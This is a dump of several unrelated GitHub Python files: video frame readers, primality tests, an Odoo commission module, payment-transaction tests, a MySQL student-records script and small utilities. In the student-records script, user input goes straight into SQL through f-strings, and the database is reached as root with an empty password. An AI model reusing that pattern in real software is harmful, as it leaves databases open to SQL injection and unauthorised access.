self.end_frame = int(attrs.get(\"CAP_PROP_FRAME_COUNT\"))\n\n self.next_frame_number = self.start_frame\n self.total_frames = self.end_frame - self.start_frame\n\n def read_frame(self, frame_number, increment=True):\n \"\"\"Read frame from HDF5 container, fulfills constraint from\n base class.\"\"\"\n\n try:\n encoded_frame = self.dset[frame_number]\n frame = cv2.imdecode(encoded_frame, cv2.IMREAD_COLOR)\n except ValueError as e:\n print(e)\n print(\"HDF5Reader returning empty frame instead.\")\n frame = None\n\n if increment:\n self.next_frame_number += 1\n\n return frame\n\n\nclass VideoReader(FrameReader):\n \"\"\"Subclass using OpenCV's VideoCapture as frame source.\"\"\"\n\n def __init__(self, filepath, end):\n super().__init__()\n\n # Set file object using filepath for reading frames\n self.filepath = filepath\n self.vid_cap = cv2.VideoCapture(str(filepath))\n self.vid_cap.grab() # Load first frame so retrieve() won't fail\n\n self.fps = self.vid_cap.get(cv2.CAP_PROP_FPS)\n self.start_frame = 0\n if end > 0:\n self.end_frame = end\n else:\n self.end_frame = int(self.vid_cap.get(cv2.CAP_PROP_FRAME_COUNT))\n\n self.next_frame_number = self.start_frame\n self.total_frames = self.end_frame - self.start_frame\n\n def read_frame(self, frame_number, increment=True):\n \"\"\"Read frame from video file, fulfills constraint from base\n class.\"\"\"\n\n _, frame = self.vid_cap.retrieve()\n\n if increment:\n self.vid_cap.grab()\n self.next_frame_number += 1\n\n return frame\n","repo_name":"joshuacwnewton/swiftwatcher","sub_path":"swiftwatcher/io_video.py","file_name":"io_video.py","file_ext":"py","file_size_in_byte":5180,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"25790001655","text":"from random import randrange\nimport math\n\n##where the two algorithms diasgree-- the algorithms will produce different outputs when provided with\n##a carmichael number, and a low value of k (high values of k will provide a high probability of true negative results for Fermat, and r!=1).\n##disagreement for non-carmichael composite numbers can occur at small values of k, since false positives can still occur with\n##probability 1/2^k (Fermat) and 1/4^k (MR). for this second case, i set k=1 and played around with some small composite\n##numbers like 2,4, and 6. after running several trials, a few false passes occurred, especially with Fermat's\n\ndef prime_test(N, k):\n\n return fermat(N,k), miller_rabin(N,k)\n\n\ndef mod_exp(x, y, N):\n\n if y == 0: #typical base case\n return 1\n\n z = mod_exp(x, math.floor(y / 2), N) #recursively seek the modulus of square root (x^y)\n\n if y % 2 == 0: #if even, simply return z^2 mod n\n return z ** 2 % N\n\n else: #if odd, scale z^2 by x and then find the modulus\n return x * (z ** 2) % N\n\n\ndef fprobability(k):\n\n return (1 - ((1 / 2) ** k)) #return the complement of the probability of each k returning a false positive, (1/2)^K, under Fermat's\n\ndef mprobability(k):\n\n return (1 - ((1 / 4) ** k)) #same as above, but for a false positive under Miller-Rubin, (1/4)^K\n\n\ndef fermat(N,k):\n\n klist = [] #create array for randomly generate integers ki\n evallist = [] #create array to store all values of r\n\n for ki in range(1, k + 1, 1): #find k random values where 0= range.starting_range and total <= range.ending_range:#2500 0 - 5000\n if commission_type == 'fix':\n sales_manager_commission = range.sales_manager_commission_amount\n sales_person_commission = range.sales_person_commission_amount\n else:\n sales_manager_commission = (line.price_subtotal * range.sales_manager_commission)/100\n sales_person_commission = (line.price_subtotal * range.sales_person_commission)/100\n sum_line_manager.append(sales_manager_commission)\n sum_line_person.append(sales_person_commission)\n\n amount_manager = sum(sum_line_manager)\n amount_person = sum(sum_line_person)\n return amount_person, amount_manager\n\n #@api.multi\n def get_productwise_commission(self):\n sum_line_manager = []\n sum_line_person = []\n amount_person = amount_manager = 0.0\n for order in self:\n for line in order.order_line:\n commission_type = line.product_id.commission_type\n if commission_type:\n if line.product_id.commission_range_ids:\n sales_manager_commission = 0.0\n sales_person_commission = 0.0\n total = line.price_subtotal\n if line.order_id.company_id.currency_id != line.order_id.currency_id:\n amount = line.order_id.currency_id.compute(line.price_subtotal, line.order_id.company_id.currency_id)\n total = amount\n \n for range in line.product_id.commission_range_ids:\n if total >= range.starting_range and total <= range.ending_range:#2500 0 - 5000\n if commission_type == 'fix':\n sales_manager_commission = range.sales_manager_commission_amount\n sales_person_commission = range.sales_person_commission_amount\n else:\n sales_manager_commission = (line.price_subtotal * range.sales_manager_commission)/100\n sales_person_commission = (line.price_subtotal * range.sales_person_commission)/100\n sum_line_manager.append(sales_manager_commission)\n sum_line_person.append(sales_person_commission)\n\n amount_manager = sum(sum_line_manager)\n amount_person = sum(sum_line_person)\n return amount_person, amount_manager\n\n #@api.multi\n def get_teamwise_commission(self):\n sum_line_manager = []\n sum_line_person = []\n amount_person = amount_manager = 0.0\n for order in self:\n\n commission_type = order.team_id.commission_type\n if commission_type:\n if order.team_id.commission_range_ids:\n sales_manager_commission = 0.0\n sales_person_commission = 0.0\n total = order.amount_untaxed\n if order.company_id.currency_id != order.currency_id:\n amount = order.currency_id.compute(order.amount_untaxed, order.company_id.currency_id)\n total = amount\n\n for range in order.team_id.commission_range_ids:\n if total >= range.starting_range and total <= range.ending_range:#2500 0 - 5000\n if commission_type == 'fix':\n sales_manager_commission = range.sales_manager_commission_amount\n sales_person_commission = range.sales_person_commission_amount\n else:\n sales_manager_commission = (order.amount_untaxed * range.sales_manager_commission)/100\n sales_person_commission = (order.amount_untaxed * range.sales_person_commission)/100\n\n amount_manager = sales_manager_commission\n amount_person = sales_person_commission\n return amount_person, amount_manager\n\n #@api.multi\n def create_commission(self, amount,commission,type):\n commission_obj = self.env['sales.commission.line']\n product = self.env['product.product'].search([('is_commission_product','=',1)],limit=1)\n for order in self:\n #Salesperson\n if amount != 0.0:\n commission_value = {\n #'sales_team_id': order.team_id.id,\n #'commission_user_id': order.user_id.id,\n 'amount': amount,\n 'origin': order.name,\n 'type':type,\n 'product_id': product.id,\n# 'date' : order.confirmation_date,\n 'date' : order.date_order,\n 'src_order_id': order.id,\n 'sales_commission_id':commission.id,\n 'sales_team_id': order.team_id and order.team_id.id or False,\n 'company_id': order.company_id.id,\n 'currency_id': order.company_id.currency_id.id,\n }\n commission_id = commission_obj.create(commission_value)\n if type == 'sales_person':\n order.commission_person_id = commission_id.id\n if type == 'sales_manager':\n order.commission_manager_id = commission_id.id\n return True\n\n #@api.multi\n def create_base_commission(self, type):\n commission_obj = self.env['sales.commission']\n product = self.env['product.product'].search([('is_commission_product','=',1)],limit=1)\n for order in self:\n if type == 'sales_person':\n user = order.user_id.id\n if type == 'sales_manager':\n user = order.team_id.user_id.id\n\n first_day_tz, last_day_tz = self.env['sales.commission']._get_utc_start_end_date()\n commission_value = {\n 'start_date' : first_day_tz,\n 'end_date': last_day_tz,\n 'product_id':product.id,\n 'commission_user_id': user,\n 'company_id': order.company_id.id,\n 'currency_id': order.currency_id.id,\n }\n commission_id = commission_obj.create(commission_value)\n return commission_id\n\n #@api.multi\n def action_confirm(self):\n res = super(SaleOrder, self).action_confirm()\n when_to_pay = self.env.company.when_to_pay\n if when_to_pay == 'sales_confirm':\n for order in self:\n commission_based_on = order.company_id.commission_based_on if order.company_id else self.env.company.commission_based_on\n if commission_based_on == 'sales_team':\n amount_person, amount_manager = order.get_teamwise_commission()\n elif commission_based_on == 'product_category':\n amount_person, amount_manager = order.get_categorywise_commission()\n elif commission_based_on == 'product_template':\n amount_person, amount_manager = order.get_productwise_commission()\n\n #Sale Person\n commission = self.env['sales.commission'].search([\n ('commission_user_id', '=', order.user_id.id),\n ('start_date', '<', order.date_order),\n ('end_date', '>', order.date_order),\n ('state', '=', 'draft'),\n ('company_id', '=', order.company_id.id),\n ], limit=1)\n if not commission:\n commission = order.create_base_commission(type='sales_person')\n order.create_commission(amount_person, commission, type='sales_person')\n\n #Sale Manager\n if not order.user_id.id == order.team_id.user_id.id and order.team_id.user_id:\n commission = self.env['sales.commission'].search([\n ('commission_user_id', '=', order.team_id.user_id.id),\n ('start_date', '<', order.date_order),\n ('end_date', '>', order.date_order),\n ('state', '=', 'draft'),\n ('company_id', '=', order.company_id.id),\n ],limit=1)\n if not commission:\n commission = order.create_base_commission(type='sales_manager')\n order.create_commission(amount_manager,commission, type='sales_manager')\n #order.create_commission(amount_person, amount_manager)\n return res\n \n #@api.multi\n def action_cancel(self):\n res = super(SaleOrder, self).action_cancel()\n for rec in self:\n if rec.commission_manager_id:\n rec.commission_manager_id.state = 'exception'\n if rec.commission_person_id:\n rec.commission_person_id.state = 'exception'\n return res\n# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:\n","repo_name":"musaab123/backup_repo","sub_path":"real_estate_commission/models/sale.py","file_name":"sale.py","file_ext":"py","file_size_in_byte":10948,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"29285409257","text":"from dataclasses import replace\nfrom datetime import timedelta\n\nimport pytest\nimport yarl\n\nfrom sendr_utils import utcnow\n\nfrom hamcrest import assert_that, equal_to, match_equality, not_none\n\nfrom pay.bill_payments.bill_payments.core.actions.transaction.create import CreateTransactionAction\nfrom pay.bill_payments.bill_payments.core.entities.mpi_3ds_info import MPI3DSInfo\nfrom pay.bill_payments.bill_payments.core.exceptions import (\n BillAlreadyPaidError,\n CoreFailError,\n MixedDepartmentsError,\n OrderAlreadyPaidError,\n OrderNotFoundError,\n PaymentMethodNotSupportedError,\n)\nfrom pay.bill_payments.bill_payments.interactions.kazna import KaznaClient\nfrom pay.bill_payments.bill_payments.interactions.kazna.entities import (\n TDS,\n DepartmentType,\n DeviceChannel,\n MpiExtInfo,\n PayerParams,\n PaymentParams,\n PayRequest,\n PayResponse,\n PayType,\n)\nfrom pay.bill_payments.bill_payments.interactions.kazna.exceptions import KaznaAPIError, KaznaAPIErrorCode\nfrom pay.bill_payments.bill_payments.storage.entities.bill import Bill\nfrom pay.bill_payments.bill_payments.storage.entities.bill_order import BillOrder\nfrom pay.bill_payments.bill_payments.storage.entities.enums import (\n BillStatus,\n OrderStatus,\n PaymentMethodType,\n TransactionStatus,\n)\nfrom pay.bill_payments.bill_payments.storage.entities.order import Order\nfrom pay.bill_payments.bill_payments.storage.entities.transaction import PayerData, Transaction\n\nTOTAL_AMOUNT = int((20000 + 30000 * 0.5) + 2000 * 2) # 39000\n\n\n@pytest.fixture\nasync def first_bill(storage, user, document):\n return await storage.bill.create(\n Bill(\n uid=user.uid,\n supplier_bill_id='bill-1',\n document_id=document.document_id,\n dep_type=DepartmentType.GIBDD,\n status=BillStatus.NEW,\n amount=20000,\n amount_to_pay=20000,\n bill_date=utcnow(),\n )\n )\n\n\n@pytest.fixture\nasync def second_bill(storage, user, first_bill, document):\n return await storage.bill.create(\n replace(\n first_bill,\n supplier_bill_id='bill-2',\n bill_id=None,\n amount=30000,\n amount_to_pay=30000,\n discount_size='50',\n discount_date=(utcnow() + timedelta(days=3)).date(),\n )\n )\n\n\n@pytest.fixture\nasync def order(storage, user, first_bill, second_bill):\n order = await storage.order.create(Order(status=OrderStatus.NEW, uid=user.uid))\n\n await storage.bill_order.create(BillOrder(order_id=order.order_id, bill_id=first_bill.bill_id))\n await storage.bill_order.create(BillOrder(order_id=order.order_id, bill_id=second_bill.bill_id))\n\n return order\n\n\n@pytest.fixture\ndef params(order):\n return {\n 'uid': order.uid,\n 'order_id': order.order_id,\n 'payment_method': PaymentMethodType.YANDEX_PAY,\n 'payer_full_name': 'Иванов Иван Иванович',\n 'payment_token': 'TOKEN',\n 'mpi_3ds_info': MPI3DSInfo(\n browser_accept_header='ACCEPT_HEADER',\n browser_color_depth=24,\n browser_ip='192.0.2.1',\n browser_language='ru',\n browser_screen_height=1080,\n browser_screen_width=1920,\n browser_tz='-180',\n browser_user_agent='USER_AGENT',\n browser_javascript_enabled=True,\n window_width=640,\n window_height=480,\n ),\n 'return_url': 'https://return-url.test',\n }\n\n\n@pytest.fixture(autouse=True)\ndef mock_kazna(mocker):\n return mocker.patch.object(\n KaznaClient,\n 'pay',\n mocker.AsyncMock(\n return_value=PayResponse(\n payment_id=44444,\n tds=TDS(\n acs_url='https://acs.test',\n creq='creq',\n ),\n )\n ),\n )\n\n\n@pytest.mark.asyncio\nasync def test_calls_kazna(params, mock_kazna, order, first_bill, second_bill):\n transaction = await CreateTransactionAction(**params).run()\n\n mock_kazna.assert_awaited_once_with(\n PayRequest(\n order_id=str(transaction.transaction_id),\n kvit=False,\n payer_params=PayerParams(fio='Иванов Иван Иванович'),\n payment_params=PaymentParams(supplier_bill_id=[first_bill.supplier_bill_id, second_bill.supplier_bill_id]),\n sign=None,\n pay_type=PayType.YANDEXPAY,\n dep_type=DepartmentType.GIBDD,\n amount=TOTAL_AMOUNT,\n mpi_ext_info=MpiExtInfo(\n notification_url='https://notification.invalid',\n browser_accept_header='ACCEPT_HEADER',\n browser_color_depth=24,\n browser_ip='192.0.2.1',\n browser_language='ru',\n browser_screen_height=1080,\n browser_screen_width=1920,\n browser_tz='-180',\n browser_user_agent='USER_AGENT',\n device_channel=DeviceChannel.BROWSER,\n browser_java_enabled=True,\n window_width=640,\n window_height=480,\n tds_notification_url='https://tds.notification.invalid',\n ),\n yp_token='TOKEN',\n return_url='https://return-url.test',\n )\n )\n\n\n@pytest.mark.parametrize(\n 'yenv_type, infered_dep_type',\n (\n pytest.param('development', DepartmentType.GIBDD, id='development-should-fallback'),\n pytest.param('testing', DepartmentType.GIBDD, id='development-should-fallback'),\n pytest.param('production', DepartmentType.UNKNOWN, id='production-should-NOT-fallback'),\n pytest.param('load', DepartmentType.UNKNOWN, id='load-should-NOT-fallback'),\n pytest.param('sandbox', DepartmentType.UNKNOWN, id='sandbox-should-NOT-fallback'),\n ),\n)\n@pytest.mark.asyncio\nasync def test_unknown_dep_fallbacks_to_gibdd(\n mocker, storage, params, mock_kazna, order, first_bill, second_bill, yenv_type, infered_dep_type\n):\n mocker.patch('yenv.type', yenv_type)\n first_bill = await storage.bill.save(replace(first_bill, dep_type=DepartmentType.UNKNOWN))\n second_bill = await storage.bill.save(replace(second_bill, dep_type=DepartmentType.UNKNOWN))\n\n await CreateTransactionAction(**params).run()\n\n [pay_request] = mock_kazna.call_args.args\n assert_that(pay_request.dep_type, equal_to(infered_dep_type))\n\n\n@pytest.mark.asyncio\nasync def test_returns_transaction(params, order):\n returned = await CreateTransactionAction(**params).run()\n\n assert_that(\n returned,\n equal_to(\n Transaction(\n order_id=order.order_id,\n status=TransactionStatus.NEW,\n amount=TOTAL_AMOUNT,\n external_payment_id='44444',\n payer_data=PayerData(payer_full_name='Иванов Иван Иванович'),\n transaction_id=match_equality(not_none()),\n payment_method=PaymentMethodType.YANDEX_PAY,\n acs_url=yarl.URL('https://acs.test?creq=creq'),\n created=match_equality(not_none()),\n updated=match_equality(not_none()),\n ),\n ),\n )\n\n\n@pytest.mark.asyncio\nasync def test_stores_transaction_in_db(storage, params):\n returned = await CreateTransactionAction(**params).run()\n\n stored = await storage.transaction.get(returned.transaction_id)\n stored.acs_url = returned.acs_url\n\n assert_that(returned, equal_to(stored))\n\n\n@pytest.mark.asyncio\nasync def test_when_dep_types_are_mixed__raises_error(storage, params, second_bill):\n second_bill = replace(second_bill, dep_type=DepartmentType.FNS)\n second_bill = await storage.bill.save(second_bill)\n\n with pytest.raises(MixedDepartmentsError):\n await CreateTransactionAction(**params).run()\n\n\n@pytest.mark.parametrize('status', set(TransactionStatus) - {TransactionStatus.NEW, TransactionStatus.CANCELLED})\n@pytest.mark.asyncio\nasync def test_when_already_completed(storage, params, order, status):\n transaction = await CreateTransactionAction(**params).run()\n await storage.transaction.save(replace(transaction, status=status))\n\n with pytest.raises(OrderAlreadyPaidError):\n await CreateTransactionAction(**params).run()\n\n\n@pytest.mark.asyncio\nasync def test_cancels_previously_started_transactions(storage, params, order):\n transaction = await CreateTransactionAction(**params).run()\n\n await CreateTransactionAction(**params).run()\n\n transaction = await storage.transaction.get(transaction.transaction_id)\n assert_that(transaction.status, equal_to(TransactionStatus.CANCELLED))\n\n\n@pytest.mark.asyncio\nasync def test_no_tds(mocker, params, order):\n mocker.patch.object(\n KaznaClient,\n 'pay',\n mocker.AsyncMock(return_value=PayResponse(payment_id=44444)),\n )\n\n transaction = await CreateTransactionAction(**params).run()\n\n assert_that(transaction.acs_url, equal_to(None))\n\n\n@pytest.mark.asyncio\nasync def test_authorizes_user(storage, params, order):\n params['uid'] = order.uid + 1\n with pytest.raises(OrderNotFoundError):\n await CreateTransactionAction(**params).run()\n\n\n@pytest.mark.asyncio\nasync def test_unknown_payment_method(storage, params, order):\n params['payment_method'] = 'card'\n with pytest.raises(PaymentMethodNotSupportedError):\n await CreateTransactionAction(**params).run()\n\n\n@pytest.mark.parametrize(\n 'code, expected_exc',\n (\n (KaznaAPIErrorCode.PAYMENT_ALREADY_EXISTS, BillAlreadyPaidError),\n (None, CoreFailError),\n ),\n)\n@pytest.mark.asyncio\nasync def test_kazna_errors(storage, mocker, params, order, code, expected_exc):\n mocker.patch.object(\n KaznaClient,\n 'pay',\n mocker.AsyncMock(\n side_effect=KaznaAPIError(\n method='method',\n service='service',\n status_code=200,\n params={'code': code},\n )\n ),\n )\n\n with pytest.raises(expected_exc):\n await CreateTransactionAction(**params).run()\n","repo_name":"Alexander-Berg/2022-tests-examples","sub_path":"pay/tests/unit/core/actions/transaction/test_create.py","file_name":"test_create.py","file_ext":"py","file_size_in_byte":10120,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"24330978106","text":"\n# Assumption 1 - make sure to run Sql server before executing the code to prevent DB not found errors.\n# Assumption 2 - Student table created with primary key Student_id\n# Assumption 3 - Attendance table created with a composite key consist with Student_id and Date\n# Assumption 4 - Each time the code will run it will check for already created DB and load existing data from it\n\nimport mysql.connector\nfrom mysql.connector import Error\n\nprint(\"*\"*10, \"Wellcome to Class Student Management System\", \"*\"*10, \"\"\"\\n\n\\tPress 1 to Enter student data and attendance data\n\\tPress 2 to Update student details\n\\tPress 3 to Delete student details\n\\tPress 4 to Show tables data (View all or Selected)\n\\tPress 5 to quite\n\"\"\")\n\n# Keep number of records in Student table under 5\ncount=0\n\n# Connecting to DB\ntry:\n connection = mysql.connector.connect(host='localhost', database='Class_Details', user='root', password='')\n cursor = connection.cursor()\nexcept Error as e:\n connection = mysql.connector.connect(host=\"localhost\", user=\"root\", password=\"\")\n cursor = connection.cursor()\n cursor.execute(\"CREATE DATABASE Class_Details\")\n\nprint(\"You're connected to database Class_Details :)\")\n\ntry:\n cursor.execute(\"CREATE TABLE Student (Student_id INT(30) PRIMARY KEY, first_name VARCHAR(225), last_name VARCHAR(225), Address VARCHAR(225), Tel VARCHAR(225))\")\nexcept Error as e:\n print(\"Table student already created :)\")\n\ntry:\n cursor.execute(\"CREATE TABLE Attendance (Student_id INT(30), Date VARCHAR(225), attendance VARCHAR(30), PRIMARY KEY (Student_id, Date))\")\nexcept Error as e:\n print(\"Table attendance already created :)\")\n\n# To assign already created rows in Student table\ncursor.execute(\"SELECT COUNT(*) FROM Student;\")\nresult = cursor.fetchone()[0]\ncount=result\nprint(\"Student Table contain \", result, \" Rows .....\")\n\n\n# fun 1 (Enter data for student table)\ndef input_data(s_count):\n print(f\"Student {s_count} details ....\")\n while True:\n try:\n s_id = int(input(\"Enter student id : \"))\n except ValueError:\n print(\"Enter a integer\")\n continue\n fn = input(\"Enter student first name : \")\n ln = input(\"Enter student last name : \")\n ad = input(\"Enter student address : \")\n tel = input(\"Enter student Tel : \")\n cursor.execute(f\"INSERT INTO Student (Student_id,first_name,last_name,Address,Tel)VALUES('{s_id}','{fn}','{ln}','{ad}','{tel}')\")\n # print(\"\\n....Set up attendance....\\n\")\n print(\"Data entered successfully\")\n break\n\n# fun 2 (Enter data for attendance table)\ndef input_attendance(s_count, s_id):\n print(f\"Student {s_count} attendance ....\")\n while True:\n date = input(\"Enter date : \")\n attendance = input(f\"Is student {s_id} present [Y/N] : \")\n attendance=attendance.lower()\n if(attendance=='y') | (attendance=='n'):\n cursor.execute(f\"INSERT INTO Attendance (Student_id,Date,attendance)VALUES('{s_id}','{date}','{attendance}')\")\n break\n else:\n print(\"attendance type you entered is not valid\")\n\n# fun 3 (Check the Previous student id when updating)\ndef previous_student_id():\n while True:\n try:\n id = int(input(\"Enter student id : \"))\n return id\n except ValueError:\n print(\"Enter a integer\")\n continue\n\nwhile True:\n choice = input(\"Select operation : \")\n if choice == \"1\":\n# Control fun 1 and fun 2 to insert data to the tables\n count=count+1\n if count<=5:\n input_data(count)\n connection.commit()\n else:\n print(\"Max Student count reached (5)!\")\n elif choice == \"2.5\":\n s_id = previous_student_id()\n input_attendance(count, s_id)\n elif choice == \"2\":\n# Below code for updating a record\n print(\"What do you want to update ^_^\")\n print(\"\"\"\n 0 - Student ID\n 1 - First name\n 2 - Last name\n 3 - Address\n 4 - Tel\n \"\"\")\n ch = input(\">>>\")\n if ch == \"0\":\n print(\"New ID:\")\n st_id = previous_student_id()\n print(\"Old ID:\")\n z = previous_student_id()\n cursor.execute(f\"UPDATE Student SET Student_id = {st_id} WHERE Student_id = {z}\")\n cursor.execute(f\"UPDATE Attendance SET Student_id = {st_id} WHERE Student_id = {z}\")\n elif ch == \"1\":\n fn = input(\"Enter student new first name : \")\n z = previous_student_id()\n cursor.execute(f\"UPDATE Student SET first_name = '{fn}' WHERE Student_id = {z}\")\n elif ch == \"2\":\n ln = input(\"Enter student new last name : \")\n z = previous_student_id()\n cursor.execute(f\"UPDATE Student SET last_name = '{ln}' WHERE Student_id = {z}\")\n elif ch == \"3\":\n ad = input(\"Enter student new address : \")\n z = previous_student_id()\n cursor.execute(f\"UPDATE Student SET Address = '{ad}' WHERE Student_id = {z}\")\n elif ch == \"4\":\n tel = input(\"Enter student new telephone No : \")\n z = previous_student_id()\n cursor.execute(f\"UPDATE Student SET Tel = '{tel}' WHERE Student_id = {z}\")\n else:\n print(\"Not a valid input\")\n continue\n connection.commit()\n elif choice == \"3\":\n# Deleting data from Student table\n print(\"ID of the student you want to delete from the table\")\n st_id = previous_student_id()\n cursor.execute(f\"DELETE FROM Student WHERE Student_id = {st_id}\")\n cursor.execute(f\"DELETE FROM Attendance WHERE Student_id = {st_id}\")\n connection.commit()\n elif choice == \"4\":\n# Display Data\n print(\"\"\"\n Press 1 - See all the Tables with all the data\n Press 2 - Specific data\n \"\"\")\n cc = input(\">>>>\")\n if cc == \"1\":\n # Display the content of student table\n print(\"... Table Student ... \\n\")\n cursor.execute(\"SELECT * FROM Student\")\n result = cursor.fetchall()\n for x in result:\n print(x)\n # Display the content of Attendance table\n print(\"... Table Attendance ... \\n\")\n cursor.execute(\"SELECT * FROM Attendance\")\n result = cursor.fetchall()\n for x in result:\n print(x)\n elif cc == \"2\":\n print(\"Enter the student id you want fetch data from\")\n st_id = previous_student_id()\n cursor.execute(f\"SELECT Date, attendance FROM Attendance WHERE Student_id = {st_id}\")\n result=cursor.fetchall()\n for x in result:\n print(x)\n else:\n print(\"Invalid input\")\n continue\n elif choice == \"5\":\n# Program termination\n cursor.close()\n print(\"<-> Program terminated <->\")\n break\n else:\n print(\"Invalid operation try again !\")\n\n\n# reference - https://pynative.com/python-mysql-database-connection/\n# reference - https://www.w3schools.com/python/python_mysql_getstarted.asp","repo_name":"Sasiru382/SQL_Plus_Python_Project","sub_path":"StudentDataSystem.py","file_name":"StudentDataSystem.py","file_ext":"py","file_size_in_byte":7102,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"29583337606","text":"class Solution:\n def restoreString(self, s: str, indices: List[int]) -> str:\n sol = []\n for i, c in enumerate(s):\n sol.append((indices[i], c))\n sol.sort()\n answer = \"\"\n for c in sol:\n answer += c[1]\n return answer\n ","repo_name":"Ihyun/LeetCode","sub_path":"shuffle-string/shuffle-string.py","file_name":"shuffle-string.py","file_ext":"py","file_size_in_byte":289,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"38919022950","text":"import matplotlib.pyplot as plt\nimport pandas as pd\n\npath = '../data/labelled_supertree/ottnames-childrenPlot.csv'\n# path = '../data/labelled_supertree/ottnames-childrenPlot-cellular_organisms.csv'\n# path = '../data/labelled_supertree/ottnames-childrenPlot-eukaryota.csv'\n\n\ndata = pd.read_csv(path, header=None)\n# print(data)\n\nprint(len(data))\n# plt.hist(data, bins=154)\n# plt.hist(data, bins=221)\n# plt.hist(data, bins=154)\n# plt.hist(data, bins=92)\nplt.hist(data, bins=235)\n# plt.xlim(0,31000)\n# plt.xlim(0,8900)\n# plt.xlim(0,31000)\n# plt.xlim(0,1000)\n# plt.xlim(0,5000)\n# plt.xscale('log')\nplt.yscale('log')\n# plt.title(\"Children per Node - Cellular Organisms\")\n# plt.title(\"Children per Node - Eukaryota\")\n# plt.title(\"Children per Node - Bacteria\")\n# plt.title(\"Children per Node - Archaea\")\nplt.title(\"Children per Node - Metazoa\")\n\nplt.xlabel(\"#Children\")\nplt.ylabel(\"#Nodes*#Children\")\n# i = 30818/154\n# i = 8855/221\n# i = 30818/154\n# i = 918/92\ni = 4747/235\nprint(i)\n\n# plt.text(22500, 100000, \"width of bins = 200\")\n# plt.text(22500, 50000, \"highest degree of node is 30818\")\n# plt.text(22500, 25000, \"#nodes = 265641\")\n# plt.text(6500, 100000, \"width of bins = 40\")\n# plt.text(6500, 50000, \"highest degree of node is 8855\")\n# plt.text(6500, 25000, \"#nodes = 243237\")\n# plt.text(20000, 10000, \"width of bins = 200\")\n# plt.text(20000, 5000, \"highest degree of node is 30818\")\n# plt.text(700, 400, \"width of bins = 10\")\n# plt.text(700, 250, \"highest degree of node is 919\")\n# plt.text(700, 150, \"#nodes = 522\")\nplt.text(3500, 100000, \"width of bins = 20\")\nplt.text(3500, 50000, \"highest degree of node is 4747\")\nplt.text(3500, 25000, \"#nodes = 180687\")\nplt.show()\n","repo_name":"Irallia/IZW-HU-Parasites","sub_path":"scripts/plotChildrenHistogram.py","file_name":"plotChildrenHistogram.py","file_ext":"py","file_size_in_byte":1672,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"} +{"seq_id":"71652099601","text":"from .config import os_name\nimport collections\nimport re\nimport os\n\n\n__all__ = ['CoreFilenameInfo', 'core_filename_info']\n\n\nCoreFilenameInfo = collections.namedtuple(\n 'CoreFilenameInfo',\n ['filename',\n 'is_zip',\n 'is_keentools_core',\n 'version',\n 'os',\n 'is_nightly',\n 'nightly_build_number'])\n\n\ndef _parse_installation_filename(filename):\n m = re.match('keentools-core-(?P\\d+\\.\\d+\\.\\d+)' + \\\n '(?:\\.(?P\\d+))?-(?P[^-]+)\\.zip',\n filename)\n if not m:\n return None\n \n version_parsed = tuple([int(x) for x in m.group('version').split('.')])\n \n return (version_parsed, m.group('nightly_version'), m.group('os'))\n\n\ndef core_filename_info(filepath):\n _, filename = os.path.split(filepath)\n is_zip = filename.lower().endswith('.zip')\n parse_result = _parse_installation_filename(filename)\n if parse_result is None:\n return CoreFilenameInfo(filename, is_zip, False, None, None, None, None)\n \n version, nightly_version, os_parsed = parse_result\n \n return CoreFilenameInfo(filename, is_zip,\n True, version, os_parsed,\n nightly_version is not None, nightly_version)\n","repo_name":"KeenTools/keentools-blender","sub_path":"keentools/blender_independent_packages/pykeentools_loader/keentools_core_filename_info.py","file_name":"keentools_core_filename_info.py","file_ext":"py","file_size_in_byte":1217,"program_lang":"python","lang":"en","doc_type":"code","stars":105,"dataset":"github-code","pt":"3"} +{"seq_id":"30117700637","text":"from __future__ import annotations\n\nfrom typing import TYPE_CHECKING, Optional\n\nfrom pygame import Vector2\n\nfrom utilities import UnlockPack, Effect\nfrom ..battleroom import DMBattleRoom\n\nif TYPE_CHECKING:\n from dm.core.game.game import DMGame\n from dm.core.objects.unit import DMUnit\n################################################################################\n\n__all__ = (\"Plague\",)\n\n################################################################################\nclass Plague(DMBattleRoom):\n\n def __init__(self, game: DMGame, position: Optional[Vector2] = None, level: int = 1):\n\n super().__init__(\n game, position,\n _id=\"ROOM-200\",\n name=\"Plague\",\n description=(\n \"Gives {value} Poison and Corpse Explosion to all heroes in \"\n \"adjacent rooms whenever a hero enters the room.\"\n ),\n level=level,\n rank=6,\n unlock=UnlockPack.Awakening,\n effects=[\n Effect(name=\"Status\", base=24, per_lv=16),\n ]\n )\n\n################################################################################\n def on_enter(self, unit: DMUnit) -> None:\n\n for room in self.adjacent_rooms + [self]:\n for hero in room.heroes:\n for status in (\"Poison\", \"Corpse Explosion\"):\n hero.add_status(status, self.effects[\"Status\"], self)\n\n################################################################################\n","repo_name":"AllegroVivo/DungeonDefense","sub_path":"dm/rooms/SixStar/Plague.py","file_name":"Plague.py","file_ext":"py","file_size_in_byte":1516,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"34809916052","text":"from datetime import datetime\nimport schedule\nimport sys\nfrom collector import PriceManipulator\nfrom config import load_config\nfrom data_store import save_record\nfrom tap30 import Tap30\nfrom snapp import Snapp\nfrom time import sleep\nfrom wait_time_calculator import waitTimeCalculator\n\n#initialize\nconfig_path = 'config.yaml'\nif len(sys.argv) == 2:\n config_path = sys.argv[1]\nconfig = load_config(config_path)\npm = PriceManipulator()\npm.add_app(Snapp, config['snapp_token'])\npm.add_app(Tap30, config['tap30_token'])\n\ndef collect_prices():\n first_try = True\n wt = waitTimeCalculator()\n while wt.still_error() or first_try:\n first_try = False\n try:\n app_price = pm.get_all_prices(config['start_cordinate'], config['dest_cordinate'])\n for app_name, price in app_price.items():\n print(datetime.now().strftime(\"%H:%M\"), app_name, price)\n save_record(price, config['result_store_path'][app_name])\n wt.reset()\n except Exception as e:\n print(e)\n wt.count_error()\n sleep_time = wt.get_wait_time()\n print(f\"waiting {sleep_time} seconds.\")\n sleep(sleep_time)\n\n# 